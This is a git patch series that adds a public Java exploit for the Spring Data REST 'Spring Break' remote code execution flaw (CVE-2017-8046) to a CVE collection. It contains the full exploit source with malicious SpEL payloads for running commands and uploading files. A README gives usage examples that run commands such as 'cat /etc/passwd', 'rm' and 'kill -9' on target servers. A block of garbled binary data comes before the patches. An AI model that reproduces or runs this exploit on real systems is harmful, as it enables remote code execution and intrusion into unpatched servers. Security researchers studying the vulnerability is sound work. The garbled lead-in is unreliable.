z`aYLCUsQT$9)KFVSS_pVW#-wApr9##Rc+JR49RW%GU%*#vVAsCKrG|=EV3MNFa|@sIO)x#>ECa7j4)u>JX@R1*AC+z(jYvXlP(8ZL)m~xZyY2KN zp(rg!_^K89^Y$O9%0{t)+O~s>v5*Xl0yi$cDL&J#TJ#I^k<8VGq86sc1d0{Z-wh~Y z+n_c%;dWsd_3XYJ9gi{Ci6R=yztovfo9GEmpmLY%P7~>a;#?qey;4}X^?a!4fgQo# zlI3r`s~uSzMr2e|@xT3a;%PjIdv!lvA>HJ#k*$1^p14e8qFTFfyDOm+k~q`g4&o1Q 
z*te&lUz94^YM?lZ9fIB=Ix@@i0zFJ-J(=OxbS8TspoZ@d7$Tpn!;kFsT3EkyZAYY}^Xa_X5 zFB>RQ;t%Pyv0kbU^MzypWmB|I6I9_i?xbvnlp`?l{HORbk0Q@nC{c&Hd;v_IS~}sZ zlKL+yJ)Y5JBN6g%K9ivi3{Jy{$pR>3(U%gaAV{G4wiPbE81m(ew^q*6 zA9Gv8HeTtl(UmrLXDB^_D+h90W0!GEsj4}oPGc*NCW?0*KSQrShvd)4e=YnkBFTSV`yYtE25EnZ|A9FAdHSyr z|0-7dSH@q{o_{h*f2I!pYsNokKmSVjYl7iV0xRtA5dNBH_*4I%ea~Me>L24*g^>_{ zNB=LD>ffvU&*HyK)j!4ce_Q;o7VEz!{4!bpB-H=+2!FL)|2^iH>G~%I0_k^W=}%|( zFBa^-NBuHk|3n%84^e-yWdA+xmnr)vuJ3<=`xh4NzsLSEY5&AhBLB}O^w(Yf9s9?^ z`~NN5ztjJ Date: Mon, 10 Apr 2023 10:57:06 +0000 Subject: [PATCH 100/109] add cve-2017-8046 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 王烁林 <17377137@buaa.edu.cn> --- cve/java-spring/2017/CVE-2017-8046/.gitignore | 60 ++ .../2017/CVE-2017-8046/LICENSE.txt | 13 + cve/java-spring/2017/CVE-2017-8046/README.md | 163 +++++ .../CVE-2017-8046/SpringBreakCve20178046.java | 651 ++++++++++++++++++ cve/java-spring/2017/CVE-2017-8046/pom.xml | 68 ++ 5 files changed, 955 insertions(+) create mode 100644 cve/java-spring/2017/CVE-2017-8046/.gitignore create mode 100644 cve/java-spring/2017/CVE-2017-8046/LICENSE.txt create mode 100644 cve/java-spring/2017/CVE-2017-8046/README.md create mode 100644 cve/java-spring/2017/CVE-2017-8046/SpringBreakCve20178046.java create mode 100644 cve/java-spring/2017/CVE-2017-8046/pom.xml diff --git a/cve/java-spring/2017/CVE-2017-8046/.gitignore b/cve/java-spring/2017/CVE-2017-8046/.gitignore new file mode 100644 index 00000000..6dc7e51e --- /dev/null +++ b/cve/java-spring/2017/CVE-2017-8046/.gitignore 
@@ -0,0 +1,60 @@
+###################
+# Compiled source #
+###################
+*.com
+*.dll
+*.exe
+*.o
+*.so
+*.bat
+
+############
+# Packages #
+############
+# it's better to unpack these files and commit the raw source
+# git has its own built in compression methods
+*.7z
+*.dmg
+*.gz
+*.iso
+*.rar
+*.tar
+*.zip
+
+######################
+# Logs and databases #
+######################
+*.log
+*.sqlite
+
+######################
+# OS generated files #
+######################
+.DS_Store*
+ehthumbs.db
+Icon?
+Thumbs.db
+*~
+
+######################
+# Other repositories #
+######################
+.svn
+.\#*
+
+####################
+# Java programming #
+####################
+build
+doc
+generated
+target
+.project
+.classpath
+.settings
+*.class
+*.jar
+*.war
+*.ear
+junit*.properties
+/bin/
diff --git a/cve/java-spring/2017/CVE-2017-8046/LICENSE.txt b/cve/java-spring/2017/CVE-2017-8046/LICENSE.txt
new file mode 100644
index 00000000..92904254
--- /dev/null
+++ b/cve/java-spring/2017/CVE-2017-8046/LICENSE.txt
@@ -0,0 +1,13 @@
+Copyright 2018 Antonio Francesco Sardella
+
+Licensed under the Apache License, Version 2.0 (the "License");
+you may not use this file except in compliance with the License.
+You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing, software
+distributed under the License is distributed on an "AS IS" BASIS,
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+See the License for the specific language governing permissions and
+limitations under the License.
\ No newline at end of file
diff --git a/cve/java-spring/2017/CVE-2017-8046/README.md b/cve/java-spring/2017/CVE-2017-8046/README.md
new file mode 100644
index 00000000..60caa5e0
--- /dev/null
+++ b/cve/java-spring/2017/CVE-2017-8046/README.md
@@ -0,0 +1,163 @@ +# spring-break_cve-2017-8046 + +This is a Java program that exploits **Spring Break** vulnerability (**CVE-2017-8046**). + +This software is written to have as less external dependencies as possible. + +## DISCLAIMER + +**This tool is intended for security engineers and appsec guys for security assessments. Please use this tool responsibly. I do not take responsibility for the way in which any one uses this application. I am NOT responsible for any damages caused or any crimes committed by using this tool.** + +## Vulnerability info + +* **CVE-ID**: CVE-2017-8046 +* **Link**: [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8046](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8046) +* **Description**: Malicious *PATCH* requests submitted to *spring-data-rest* servers in **Pivotal Spring Data REST** versions prior to **2.5.12**, **2.6.7**, **3.0 RC3**, **Spring Boot** versions prior to **2.0.0M4**, and **Spring Data** release trains prior to **Kay-RC3** can use specially crafted JSON data to run arbitrary Java code. +* **Vendor link**: [https://pivotal.io/security/cve-2017-8046](https://pivotal.io/security/cve-2017-8046) + +## How to generate an executable JAR + +Here some steps to follow in order to generate an executable JAR, with all dependencies into it, that can be used to launch the exploit. + +### with Maven + +Following Maven command can be launched: + +``` +mvn clean compile package +``` + +### with Eclipse + +Following steps can be done: +1. solve all external dependencies/libraries; +1. right click on the Eclipse project and go to `Run As > Run Configurations`; +1. right click on `Java Application` then on `New`; +1. choose a name and set the main class to `com.afs.exploit.spring.SpringBreakCve20178046`; +1. click on `Apply` button; +1. close the window and go back to the main Eclipse window; +1. right click on the Eclipse project and click on `Export...`; +1. 
find and choose `Runnable JAR file` (under `Java` branch); +1. in the following window: + 1. choose the correct `Launch configuration` created before; + 1. choose an `Export destination`; + 1. choose the option `Extract required libraries into generated JAR`; + 1. click on `Finish` button. + +## Help + +``` +Usage: + java -jar spring-break_cve-2017-8046.jar [options] +Description: + Exploiting 'Spring Break' Remote Code Execution (CVE-2017-8046). +Options: + -h, --help + Prints this help and exits. + -u, --url [target_URL] + The target URL where the exploit will be performed. + You have to choose an existent resource. + -cmd, --command [command_to_execute] + The command that will be executed on the remote machine. + -U, --upload [file_to_upload] + File to upload to the remote machine. Will be uploaded to the current working + directory of the java process. Warning: this will only succeed on a server running + JRE-1.7 or later. + --remote-upload-directory [/some/existing/path/] + Optional. Server will attempt to write the uploaded file to this directory on the + filesystem. Specified directory must exist and be writeable. + --cookies [cookies] + Optional. Cookies passed into the request, e.g. authentication cookies. + -H, --header [custom_header] + Optional. Custom header passed into the request, e.g. authorization header. + -k + Skip SSL validation + --clean + Optional. Removes error messages in output due to the usage of the + exploit. It could hide error messages if the request fails for other reasons. + --error-stream + Optional. In case of errors the command will fail and the error stream will + not be returned. This option can be used to relaunch the remote command + returning the error stream. + -v, --verbose + Optional. Increase verbosity. 
+``` + + +## Examples + +``` +java -jar spring-break_cve-2017-8046.jar --url "https://vuln01.foo.com/api/v1/entity/123" --command ipconfig +``` + +``` +java -jar spring-break_cve-2017-8046.jar --url "https://vuln02.foo.com/api/v2/entity/42" --command ipconfig --cookies "JSESSIONID=qwerty0123456789" +``` + +``` +java -jar spring-break_cve-2017-8046.jar -v --url "https://vuln02.foo.com/api/v2/entity/42" --upload file.sh --remote-upload-directory /tmp +``` + +``` +java -jar spring-break_cve-2017-8046.jar --url "https://vuln03.foo.com/asd/api/v1/entity/1" --command dir --cookies "JSESSIONID=qwerty0123456789;foo=bar" +``` + +``` +java -jar spring-break_cve-2017-8046.jar --url "https://vuln04.foo.com/asd/api/v1/entity/1" --command "dir C:\Windows" --clean +``` + +``` +java -jar spring-break_cve-2017-8046.jar --url "https://vuln05.foo.com/asd/api/v1/entity/1" --command "copy /b NUL ..\..\pwned.txt" --clean +``` + +``` +java -jar spring-break_cve-2017-8046.jar --url "https://vuln06.foo.com/asd/api/v1/entity/1" --command "ping -c 3 www.google.it" --clean +``` + +``` +java -jar spring-break_cve-2017-8046.jar --url "https://vuln07.foo.com/asd/api/v1/entity/1" --command "ps aux" --clean +``` + +``` +java -jar spring-break_cve-2017-8046.jar --url "https://vuln08.foo.com/asd/api/v1/entity/1" --command "uname -a" --clean +``` + +``` +java -jar spring-break_cve-2017-8046.jar --url "https://vuln09.foo.com/asd/api/v1/entity/1" --command "ls -l" --clean +``` + +``` +java -jar spring-break_cve-2017-8046.jar --url "https://vuln10.foo.com/asd/api/v1/entity/1" --command "wget https://www.google.com" --clean +``` + +``` +java -jar spring-break_cve-2017-8046.jar --url "https://vuln11.foo.com/asd/api/v1/entity/1" --command "rm index.html" --clean +``` + +``` +java -jar spring-break_cve-2017-8046.jar --url "https://vuln12.foo.com/asd/api/v1/entity/1" --command "cat /etc/passwd" --clean +``` + +``` +java -jar spring-break_cve-2017-8046.jar --url "https://vuln13.foo.com/asd/api/v1/entity/1" 
--command "kill -9 5638" --clean +``` + +Please note that the referenced resource/URL must exist! + +## Vulnerable application + +A vulnerable application can be found [here](https://github.com/m3ssap0/SpringBreakVulnerableApp). + +## Authors + +* **Antonio Francesco Sardella** - *main implementation* - [m3ssap0](https://github.com/m3ssap0) +* **Yassine Tioual** - *HTTP header enhancement* - [nisay759](https://github.com/nisay759) +* **Robin Wagenaar** - *for the suggestion to use patch operation 'remove' instead of 'replace' and for the file upload functionality* - [RobinWagenaar](https://github.com/RobinWagenaar) + +## License + +This project is licensed under the Apache License Version 2.0 - see the **LICENSE.txt** file for details. + +## Acknowledgments + +* [Man Yue Mo](https://lgtm.com/blog/spring_data_rest_CVE-2017-8046_ql) the security researcher who discovered the vulnerability \ No newline at end of file diff --git a/cve/java-spring/2017/CVE-2017-8046/SpringBreakCve20178046.java b/cve/java-spring/2017/CVE-2017-8046/SpringBreakCve20178046.java new file mode 100644 index 00000000..7488b58c --- /dev/null +++ b/cve/java-spring/2017/CVE-2017-8046/SpringBreakCve20178046.java 
@@ -0,0 +1,651 @@ +// Exploit Title: RCE in PATCH requests in Spring Data REST +// Date: 2018-03-10 +// Exploit Author: Antonio Francesco Sardella +// Vendor Homepage: https://pivotal.io/ +// Software Link: https://projects.spring.io/spring-data-rest/ +// Version: Spring Data REST versions prior to 2.6.9 (Ingalls SR9), 3.0.1 (Kay SR1) +// Tested on: 'Microsoft Windows 7' and 'Xubuntu 17.10.1' with 'spring-boot-starter-data-rest' version '1.5.6.RELEASE' +// CVE: CVE-2017-8046 +// Category: Webapps +// Repository: https://github.com/m3ssap0/spring-break_cve-2017-8046 +// Example Vulnerable Application: https://github.com/m3ssap0/SpringBreakVulnerableApp +// Vulnerability discovered and reported by: Man Yue Mo from Semmle and lgtm.com + +package com.afs.exploit.spring; + +import java.io.BufferedReader; +import java.io.File; +import java.io.IOException; +import java.io.InputStreamReader; +import java.net.URI; +import java.net.URISyntaxException; +import java.util.ArrayList; +import java.util.List; + +import org.apache.commons.codec.binary.Base64; +import org.apache.commons.io.FileUtils; +import org.apache.http.HttpResponse; +import org.apache.http.client.HttpClient; +import org.apache.http.client.methods.HttpPatch; +import org.apache.http.entity.StringEntity; +import org.apache.http.impl.client.HttpClientBuilder; +import org.apache.http.ssl.SSLContextBuilder; +import org.apache.http.conn.ssl.TrustSelfSignedStrategy; +import org.apache.http.conn.ssl.SSLConnectionSocketFactory; +import org.apache.http.conn.ssl.NoopHostnameVerifier; + +/** + * This is a Java program that exploits Spring Break vulnerability (CVE-2017-8046). + * This software is written to have as less external dependencies as possible. + * DISCLAIMER: This tool is intended for security engineers and appsec guys for security assessments. Please + * use this tool responsibly. I do not take responsibility for the way in which any one uses this application. 
+ * I am NOT responsible for any damages caused or any crimes committed by using this tool. + * .................. + * . CVE-ID ........: CVE-2017-8046 + * . Link ..........: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8046 + * . Description ...: Malicious PATCH requests submitted to spring-data-rest servers in Pivotal Spring Data REST + * .................. versions prior to 2.5.12, 2.6.9, 3.0 RC3, Spring Boot versions prior to 2.0.0M4, and Spring + * .................. Data release trains prior to Kay-RC3 can use specially crafted JSON data to run arbitrary + * .................. Java code. + * .................. + * + * @author Antonio Francesco Sardella + */ +public class SpringBreakCve20178046 { + + /** + * Version string. + */ + private static final String VERSION = "v1.6 (2018-10-13)"; + + /** + * The JSON Patch object. + */ + private static String JSON_PATCH_OBJECT = "[{ \"op\" : \"remove\", \"path\" : \"%s\", \"value\" : \"pwned\" }]"; + + /** + * This is a way to bypass the split and 'replace' + * logic performed by the framework on slashes. + */ + private static String SLASH = "(new java.lang.String(new char[]{0x2F}))"; + + /** + * Malicious SpEL-script for executing commands. + */ + private static String COMMAND_PAYLOAD; + static { + COMMAND_PAYLOAD = "T(org.springframework.util.StreamUtils).copy("; + COMMAND_PAYLOAD += "T(java.lang.Runtime).getRuntime().exec("; + COMMAND_PAYLOAD += "("; + COMMAND_PAYLOAD += "T(java.lang.System).getProperty(\\\"os.name\\\").toLowerCase().contains(\\\"win\\\")"; + COMMAND_PAYLOAD += "?"; + COMMAND_PAYLOAD += "\\\"cmd \\\"+" + SLASH + "+\\\"c \\\""; + COMMAND_PAYLOAD += ":"; + COMMAND_PAYLOAD += "\\\"\\\""; + COMMAND_PAYLOAD += ")+"; + COMMAND_PAYLOAD += "%s"; // The encoded command will be placed here. 
+ COMMAND_PAYLOAD += ").get%sStream()"; + COMMAND_PAYLOAD += ","; + COMMAND_PAYLOAD += "T(org.springframework.web.context.request.RequestContextHolder).currentRequestAttributes()"; + COMMAND_PAYLOAD += ".getResponse().getOutputStream()"; + COMMAND_PAYLOAD += ").x"; + } + + /** + * Malicious SpEL-script for uploading files (like scripts, binaries, etc). + */ + private static String FILEUPLOAD_PAYLOAD; + static { + // Classes java.nio.file.* are only available in Java 7+. + FILEUPLOAD_PAYLOAD = "T(java.nio.file.Files).write("; + FILEUPLOAD_PAYLOAD += "T(java.nio.file.Paths).get(%s),"; + FILEUPLOAD_PAYLOAD += "T(java.util.Base64).getDecoder().decode(\\\"%s\\\")"; + FILEUPLOAD_PAYLOAD += ").x"; + } + + /** + * Error cause string that can be used to "clean the response." + */ + private static String ERROR_CAUSE = "{\"cause"; + + /** + * Constant that will be used to get input stream. + */ + private static String INPUT_STREAM = "Input"; + + /** + * Constant that will be used to get error stream. + */ + private static String ERROR_STREAM = "Error"; + + /** + * The target URL. + */ + private URI url; + + /** + * Whether to skipSSL or not, default set to false + */ + private boolean skipSSL; + + /** + * The command that will be executed on the remote machine. + */ + private String command; + + /** + * Cookies that will be passed. + */ + private String cookies; + + /** + * Flag used to remove error messages in output due to + * the usage of the exploit. It could hide error messages + * if the request fails for other reasons. + */ + private boolean cleanResponse; + + /** + * This flag can be used to retrieve the error stream + * in case the launched remote command fails unexpectedly. + */ + private boolean errorStream; + + /** + * Verbosity flag. + */ + private boolean verbose; + + /** + * Custom headers that will be passed. + */ + private List customHeaders = new ArrayList(); + + /** + * Path that will point to a file on the local filesystem, which will + * be uploaded. 
Uploads cannot be used in conjunction with commands in the + * same request. + */ + private File localFileToUpload; + + /** + * Server will upload the file to this location, e.g. /tmp or C:\TEMP. This path + * will be encoded to ensure that Spring will not convert slashes to dots. + */ + private String remoteUploadDirectory; + + /** + * Default constructor. + */ + public SpringBreakCve20178046() { + this.verbose = false; + this.cleanResponse = false; + this.errorStream = false; + this.skipSSL = false; + } + + /** + * Performs the exploit. + * + * @throws IOException + * If something bad occurs during HTTP GET. + */ + public void exploit() throws IOException { + checkInput(); + printInput(); + String payload = preparePayload(); + String response = httpPatch(payload); + printOutput(response); + } + + /** + * Checks the input. + */ + private void checkInput() { + if (this.url == null) { + throw new IllegalArgumentException("URL must be passed."); + } + + if ((isEmpty(this.command) && this.localFileToUpload == null) || (!isEmpty(this.command) && this.localFileToUpload != null)) { + throw new IllegalArgumentException("Either a command must be passed, or a file must be selected for upload."); + } + } + + /** + * Prints input if verbose flag is true. + */ + private void printInput() { + if (isVerbose()) { + System.out.println("[*] Target URL ........: " + this.url); + if (!isEmpty(this.command)) { + System.out.println("[*] Command ...........: " + this.command); + } + if (this.localFileToUpload != null) { + System.out.println("[*] File to upload ....: " + this.localFileToUpload.getAbsolutePath()); + if (!isEmpty(this.remoteUploadDirectory)) { + System.out.println("[*] Remote upload dir .: " + this.remoteUploadDirectory); + } + } + System.out.println("[*] Cookies ...........: " + (isEmpty(this.cookies) ? "(no cookies)" : this.cookies)); + System.out.println("[*] Headers ...........: " + (this.customHeaders == null || this.customHeaders.isEmpty() ? 
"(no headers)" : "(" + this.customHeaders.size() + " headers)")); + if (this.customHeaders != null && !this.customHeaders.isEmpty()) { + for (String header : this.customHeaders) { + System.out.println(" > " + header); + } + } + System.out.println("[*] Clean response ....: " + this.cleanResponse); + System.out.println("[*] Ret error stream ..: " + this.errorStream); + System.out.println("[*] Verbose ...........: " + this.verbose); + } + } + + /** + * Prepares the payload. + * + * @return The malicious payload that will be injected. + */ + private String preparePayload() { + System.out.println("[*] Preparing payload."); + String payload = null; + + // Send a command to the server: + if (!isEmpty(this.command)) { + String encodedCommand = encode(this.command); // Encoding inserted command. + String maliciousSpEL = String.format(COMMAND_PAYLOAD, encodedCommand, isErrorStream() ? ERROR_STREAM : INPUT_STREAM); + payload = String.format(JSON_PATCH_OBJECT, maliciousSpEL); // Placing payload into JSON Patch object. + } + + // Upload a file to the server: + else if (this.localFileToUpload != null) { + try { + // Remote preparing filename / directory. + String filename = this.localFileToUpload.getName(); + if (remoteUploadDirectory != null) { + filename = remoteUploadDirectory + filename; + filename = encode(filename); + } + + // Reading file content to byte[] instead of string avoids potential text encoding issues. + byte[] rawFileContent = FileUtils.readFileToByteArray(this.localFileToUpload); + String encodedFileContent = Base64.encodeBase64String(rawFileContent); + String maliciousSpEL = String.format(FILEUPLOAD_PAYLOAD, filename, encodedFileContent); + payload = String.format(JSON_PATCH_OBJECT, maliciousSpEL); + + } catch (IOException e) { + throw new RuntimeException(e); + } + } + + if (isVerbose()) { + System.out.println("[*] Payload ...........: " + payload); + } + + return payload; + } + + /** + * Encodes the inserted command. + * + * @return The encoded command. 
+ */ + private String encode(String command) { + StringBuffer encodedCommand = new StringBuffer("(new java.lang.String(new char[]{"); + + int commandLength = command.length(); + for (int i = 0; i < commandLength; i++) { + encodedCommand.append((int) command.charAt(i)); + if (i + 1 < commandLength) { + encodedCommand.append(","); + } + } + + encodedCommand.append("}))"); + + if (isVerbose()) { + System.out.println("[*] Encoded command ...: " + encodedCommand.toString()); + } + + return encodedCommand.toString(); + } + + /** + * HTTP PATCH operation on the target passing the malicious payload. + * + * @param payload + * The malicious payload. + * @return The response as a string. + * @throws IOException + * If something bad occurs during HTTP GET. + */ + private String httpPatch(String payload) throws IOException { + System.out.println("[*] Sending payload."); + + // Preparing PATCH operation. + HttpClientBuilder clientBuilder = HttpClientBuilder.create(); + + // Disable SSL Verification + if(this.url.getScheme().equalsIgnoreCase("https") && this.skipSSL){ + try{ + SSLContextBuilder sslBuilder = new SSLContextBuilder(); + sslBuilder.loadTrustMaterial(null, new TrustSelfSignedStrategy()); + // Since certificates contain hostnames, not ip addresses, if we try https://ipAddress + // a SSLPeerUnverifiedException would be thrown because hostname in certificate does not match + // ip used in https://ipAddress, to avoid that error we need to use the overloaded constructor taking as second arg NoopHostnameVerifier. 
+ SSLConnectionSocketFactory sslConnectionFactory = new SSLConnectionSocketFactory(sslBuilder.build(), NoopHostnameVerifier.INSTANCE); + clientBuilder.setSSLSocketFactory(sslConnectionFactory); + } catch(Exception exception) { + // Errors that may be thrown: KeyManagementException, KeyStoreException, NoSuchAlgorithmException, SSLPeerUnverifiedException + throw new RuntimeException(exception); + } + } + + HttpClient client = clientBuilder.build(); + + HttpPatch patch = new HttpPatch(this.url); + patch.setHeader("User-Agent", "Mozilla/5.0"); + patch.setHeader("Accept-Language", "en-US,en;q=0.5"); + patch.setHeader("Content-Type", "application/json-patch+json"); // This is a JSON Patch. + if (!isEmpty(this.cookies)) { + patch.setHeader("Cookie", this.cookies); + } + if (!customHeaders.isEmpty()) { + for (String header : this.customHeaders) { + String key = header.split(":")[0]; + String value = header.split(":")[1]; + patch.setHeader(key, value); + } + } + patch.setEntity(new StringEntity(payload)); + + // Response string. + StringBuffer response = new StringBuffer(); + + // Executing PATCH operation. + HttpResponse httpResponse = client.execute(patch); + if (httpResponse != null) { + + // Reading response code. + if (httpResponse.getStatusLine() != null) { + int responseCode = httpResponse.getStatusLine().getStatusCode(); + System.out.println("[*] HTTP " + responseCode); + } else { + System.out.println("[!] HTTP response code can't be read."); + } + + // Reading response content. + if (httpResponse.getEntity() != null && httpResponse.getEntity().getContent() != null) { + BufferedReader in = new BufferedReader(new InputStreamReader(httpResponse.getEntity().getContent())); + String inputLine; + + while ((inputLine = in.readLine()) != null) { + response.append(inputLine); + response.append(System.getProperty("line.separator")); + } + in.close(); + } else { + System.out.println("[!] HTTP response content can't be read."); + } + + } else { + System.out.println("[!] 
HTTP response is null."); + } + + return response.toString(); + } + + /** + * Prints output. + * + * @param response + * Response that will be printed. + */ + private void printOutput(String response) { + if (!isEmpty(response)) { + System.out.println("[*] vvv Response vvv"); + + // Cleaning response (if possible). + if (isCleanResponse() && response.contains(ERROR_CAUSE)) { + String cleanedResponse = response.split("\\" + ERROR_CAUSE)[0]; + System.out.println(cleanedResponse); + } else { + System.out.println(response); + } + + System.out.println("[*] ^^^ ======== ^^^"); + } + } + + /** + * Checks if an input string is null/empty or not. + * + * @param input + * The input string to check. + * @return True if the string is null or empty, false otherwise. + */ + private boolean isEmpty(String input) { + boolean isEmpty; + + if (input == null || input.trim().length() < 1) { + isEmpty = true; + } else { + isEmpty = false; + } + + return isEmpty; + } + + /* Getters and setters. */ + + public boolean isVerbose() { + return verbose; + } + + public void setVerbose(boolean verbose) { + this.verbose = verbose; + } + + public void setUrl(String url) throws URISyntaxException { + if (isEmpty(url)) { + throw new IllegalArgumentException("URL must be not null and not empty."); + } + + this.url = new URI(url.trim()); + } + + public void setCommand(String command) { + if (isEmpty(command)) { + throw new IllegalArgumentException("Command must be not null and not empty."); + } + + this.command = command.trim(); + } + + public void setCookies(String cookies) { + if (cookies != null) { + cookies = cookies.trim(); + } + + this.cookies = cookies; + } + + public void setSkipSSL(boolean skipSSL){ + this.skipSSL = skipSSL; + } + + public void setCustomHeader(String customHeader) { + if (customHeader != null && customHeader.contains(":") && !customHeader.startsWith(":") && !customHeader.endsWith(":")) { + customHeader = customHeader.trim(); + this.customHeaders.add(customHeader); + } + } + 
+ public boolean isCleanResponse() { + return cleanResponse; + } + + public void setCleanResponse(boolean cleanResponse) { + this.cleanResponse = cleanResponse; + } + + public boolean isErrorStream() { + return errorStream; + } + + public void setErrorStream(boolean errorStream) { + this.errorStream = errorStream; + } + + public void setLocalFileToUpload(String localFileToUpload) { + if (isEmpty(localFileToUpload)) { + throw new IllegalArgumentException("Filename must not be null and not empty."); + } + + File upload = new File(localFileToUpload); + if (!upload.exists() || !upload.isFile() || !upload.canRead()) { + throw new IllegalArgumentException("File to upload does not exist or is not readable: " + upload.getAbsolutePath()); + } + + this.localFileToUpload = upload; + } + + public void setRemoteUploadDirectory(String remoteUploadDirectory) { + if (!remoteUploadDirectory.endsWith("/")) { + remoteUploadDirectory += "/"; + } + this.remoteUploadDirectory = remoteUploadDirectory; + } + + /** + * Shows the program help. + */ + public static final void help() { + System.out.println("Usage:"); + System.out.println(" java -jar spring-break_cve-2017-8046.jar [options]"); + System.out.println("Description:"); + System.out.println(" Exploiting 'Spring Break' Remote Code Execution (CVE-2017-8046)."); + System.out.println("Options:"); + System.out.println(" -h, --help"); + System.out.println(" Prints this help and exits."); + System.out.println(" -u, --url [target_URL]"); + System.out.println(" The target URL where the exploit will be performed."); + System.out.println(" You have to choose an existent resource."); + System.out.println(" -cmd, --command [command_to_execute]"); + System.out.println(" The command that will be executed on the remote machine."); + System.out.println(" -U, --upload [file_to_upload]"); + System.out.println(" File to upload to the remote machine. Will be uploaded to the current working"); + System.out.println(" directory of the Java process. 
Warning: this will only succeed on a server running"); + System.out.println(" JRE-1.7 or later."); + System.out.println(" --remote-upload-directory [/some/existing/path/]"); + System.out.println(" Optional. Server will attempt to write the uploaded file to this directory on the"); + System.out.println(" filesystem. Specified directory must exist and be writeable."); + System.out.println(" --cookies [cookies]"); + System.out.println(" Optional. Cookies passed into the request, e.g. authentication cookies."); + System.out.println(" -H, --header [custom_header]"); + System.out.println(" Optional. Custom header passed into the request, e.g. authorization header."); + System.out.println(" -k"); + System.out.println(" Skip SSL validation"); + System.out.println(" --clean"); + System.out.println(" Optional. Removes error messages in output due to the usage of the"); + System.out.println(" exploit. It could hide error messages if the request fails for other reasons."); + System.out.println(" --error-stream"); + System.out.println(" Optional. In case of errors the command will fail and the error stream will"); + System.out.println(" not be returned. This option can be used to relaunch the remote command"); + System.out.println(" returning the error stream."); + System.out.println(" -v, --verbose"); + System.out.println(" Optional. Increase verbosity."); + } + + /** + * Main method. 
+ * + * @param args + * Input arguments + */ + public static void main(String[] args) { + try { + System.out.println("'Spring Break' RCE (CVE-2017-8046) - " + VERSION); + SpringBreakCve20178046 o = new SpringBreakCve20178046(); + + if (args.length > 0) { + for (int i = 0; i < args.length; i++) { + + String p = args[i]; + + if (("-h".equals(p) || "--help".equals(p)) && i == 0) { + SpringBreakCve20178046.help(); + return; + } else if ("-u".equals(p) || "--url".equals(p)) { + + if (i + 1 > args.length - 1) { + throw new IllegalArgumentException("URL must be passed."); + } + o.setUrl(args[++i]); + + } else if ("-U".equals(p) || "--upload".equals(p)) { + + if (i + 1 > args.length - 1) { + throw new IllegalArgumentException("File must be passed, if specified."); + } + o.setLocalFileToUpload(args[++i].trim()); + + } else if ("--remote-upload-directory".equals(p)) { + + if (i + 1 > args.length - 1) { + throw new IllegalArgumentException("Remote directory must be passed, if specified."); + } + o.setRemoteUploadDirectory(args[++i].trim()); + + } else if ("-cmd".equals(p) || "--command".equals(p)) { + + if (i + 1 > args.length - 1) { + throw new IllegalArgumentException("Command must be passed."); + } + o.setCommand(args[++i]); + + } else if ("--cookies".equals(p)) { + + if (i + 1 > args.length - 1) { + throw new IllegalArgumentException("Cookies must be passed, if specified."); + } + o.setCookies(args[++i]); + + } else if ("-k".equals(p)) { + + o.setSkipSSL(true); + + } else if ("-H".equals(p) || "--header".equals(p)) { + + if (i + 1 > args.length - 1) { + throw new IllegalArgumentException("Custom header must be passed, if specified."); + } + o.setCustomHeader(args[++i]); + + } else if ("--clean".equals(p)) { + o.setCleanResponse(true); + } else if ("--error-stream".equals(p)) { + o.setErrorStream(true); + } else if ("-v".equals(p) || "--verbose".equals(p)) { + o.setVerbose(true); + } + + } + + // Performing the exploit. 
+ o.exploit(); + + } else { // Wrong number of arguments. + SpringBreakCve20178046.help(); + return; + } + + } catch (URISyntaxException use) { + System.out.println("[!] Input error (URI syntax exception): " + use.getMessage()); + } catch (IllegalArgumentException iae) { + System.out.println("[!] Input error (illegal argument): " + iae.getMessage()); + } catch (Exception e) { + System.out.println("[!] Unexpected exception: " + e.getMessage()); + e.printStackTrace(); + } + } + +} diff --git a/cve/java-spring/2017/CVE-2017-8046/pom.xml b/cve/java-spring/2017/CVE-2017-8046/pom.xml new file mode 100644 index 00000000..0cb3f6ed --- /dev/null +++ b/cve/java-spring/2017/CVE-2017-8046/pom.xml @@ -0,0 +1,68 @@ + + 4.0.0 + com.afs.exploit + spring-break_cve-2017-8046 + 1.3 + spring-break_cve-2017-8046 + This is a Java program that exploits Spring Break vulnerability (CVE-2017-8046). + + 1.7 + 1.7 + + + src/main/java + + + maven-compiler-plugin + 3.1 + + + + + + + org.apache.maven.plugins + maven-assembly-plugin + + + package + + single + + + + + com.afs.exploit.spring.SpringBreakCve20178046 + + + + jar-with-dependencies + + + + + + + + + + org.apache.httpcomponents + httpclient + 4.5.5 + + + + + commons-io + commons-io + 2.6 + + + https://github.com/m3ssap0/spring-break_cve-2017-8046 + \ No newline at end of file From 4cc2e0816d79a4150ce8db51105d3637ac06c52a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn> Date: Mon, 10 Apr 2023 10:57:17 +0000 Subject: [PATCH 101/109] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20?= =?UTF-8?q?cve/java-spring/2017/CVE-2017-8046/spring-break=5Fcve-2017-8046?= =?UTF-8?q?-master.zip?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../spring-break_cve-2017-8046-master.zip | Bin 12833 -> 0 bytes 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/java-spring/2017/CVE-2017-8046/spring-break_cve-2017-8046-master.zip 
